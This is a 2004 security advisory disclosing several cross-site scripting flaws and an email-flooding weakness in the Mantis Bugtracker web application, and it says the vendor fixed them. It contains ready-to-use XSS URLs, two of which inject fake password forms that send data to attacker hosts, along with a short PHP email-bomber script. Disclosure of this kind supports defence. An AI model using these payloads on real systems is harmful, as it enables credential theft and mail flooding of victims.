--------------------------------------------------------------------------- 
                Multiple vulnerabilities in Mantis 
Bugtracker 
--------------------------------------------------------------------------- 
 
Author: Joxean Koret 
Date: This year, 2004 :) between June and 
August 
Location: Basque Country 
 
--------------------------------------------------------------------------- 
 
Affected software description: 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
Mantis Bugtracker 
 
Mantis is a web-based bugtracking system. It is 
written in the PHP scripting  
language and requires the MySQL database and 
a webserver.  
 
--------------------------------------------------------------------------- 
 
Vulnerabilities: 
~~~~~~~~~~~~~~~~ 
 
A. Multiple Cross Site Scripting Vulnerabilities : 
 
A1. The first vulnerability that I found is this : You 
can login in anonymously and,  
when do you want to perform a privileged action 
you need to re-login with any valid  
user. The previous URL is passed as the return 
parameter to the login_page.php script.  
This parameter is not correctly sanitized when 
showing/parsing and we can put any  
html/script code that we want. To try the first 
vulnerability copy the following text  
and paste in the location bar of your favourite 
web  browser :  
  
 http://<site-with-mantis-bugtracker>/login_page.php?return=%
22%3E%3Ch1%3EHello!%3C/h1%3E%
3Cform%20action=%
22http://malicious.site.com/script.xxx%22%
3EPlease%20type%20your%20password%20:
%20%3Cinput%20type=%22password%22%
20name=%22your_password%22%3E%3Cbr%
3E%3Cinput%20type=%22submit%22%
20value=%22Give%20me%20your%
20password,%20please...%22%3E%3C/form%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr 
 
A2. Register New User Xss Vulnerability 
 
 -The second XSS problem is in the script 
signup.php (for example, 
http://bugs.mantisbt.org/signup.php). [^] This 
scripts registers 
 a new user. The problem is that the script's 
doesn't sanitize properly the passed e-mail 
when showing/parsing. Now, we have  
 the second XSS problem that I found. To test it, 
please follow these steps :  
  
     - Navigate to 
http://<site-with-mantis-bugtracker>/signup_page.php 
[^] 
     - In the username field type any username 
that you want 
     - In the e-mail field type this text : <iframe 
src=http://www.playboy.com></iframe> or 
<h1>Hi!</h1> 
 
A3. Select Project XSS Vulnerability 
 ------------------------------------ 
  
 -I will no explicate the problem because is the 
same all times. Try the following URL please :  
  
 http://<site-with-mantis-bugtracker>/login_select_proj_page.php?ref=%
3Cbr%3E%3Cform%20action=%
22http://my.fucking.site/xxx.sss%22%3E%
3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%
3C/td%3E%3Ctd%3E%3Cinput%20type=text%
20name=user%3E%3C/tr%3E%3Ctr%3E%
3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%
3Cinput%20type=password%20name=pass%
3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%
20colspan=2%3E%3Cinput%20type=submit%
20%20value=%22login%22%20onclick=%
22javascript:alert('hi')%22%3E%3C/td%3E%
3C/tr%3E%3C/form%3E     
  
A4. An other XSS Vulnerability  
 
 - Try the following URL :  
  
  http://<site-with-mantis-bugtracker>/view_all_set.php?type=1&reporter_id=5031&hide_status=80&lt;script&gt;alert('hi')&lt;/script&gt; 
 
---------------------------------------------- 
 
 
B. Possible E-Mail Bomber. 
 
 - That's fun! We can create a simple program to 
send too many e-mails to the same e-mail 
address by simply changing the username.  
  
 For example : 
  
 1.-Navigate to 
http://<site-with-mantis-bugtracker>/signup_page.php 
 2.- In the username field type test0 
 3.- In the e-mail type test@test.com 
 4.- Send it. 
  
 1.-Navigate to 
http://<site-with-mantis-bugtracker>/signup_page.php 
 2.- In the username field type test1 
 3.- In the e-mail type test@test.com 
 4.- Send it. 
 
If do you want to try the problem you can use the 
following simple script :  
 
====================================================================== 
 
mantis-email-bomber.php 
 
<?php 
 
//Please, change it becuase is my e-mail :) 
$email = "anyemail@address"; 
$base_user = "test"; 
$i = 0; 
$site = "http://<site-with-mantis-bugtracker"; 
 
for ($i=0;$i<=15;$i++) 
{ 
	echo("Sending e-mail number $i\n"); 
	$user = "$base_user$i"; 
	echo("New user is $user\n"); 
	$url = 
"http://$site/signup.php?username=$user&email=$email"; 
	echo("URL is $url\n"); 
	$fd = fopen($url,"r"); 
	echo("E-mail $i sended\n");		 
	fclose($fd); 
} 
 
?> 
 
====================================================================== 
 
--------------------------------------------------------------------------- 
 
The fix: 
~~~~~~~~ 
 
Vendor is contacted and all the bugs are 
correcteds in the CVS version at 
sourceforge.net site. 
 
--------------------------------------------------------------------------- 
Contact: 
~~~~~~~~ 
 
	Joxean Koret at 
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es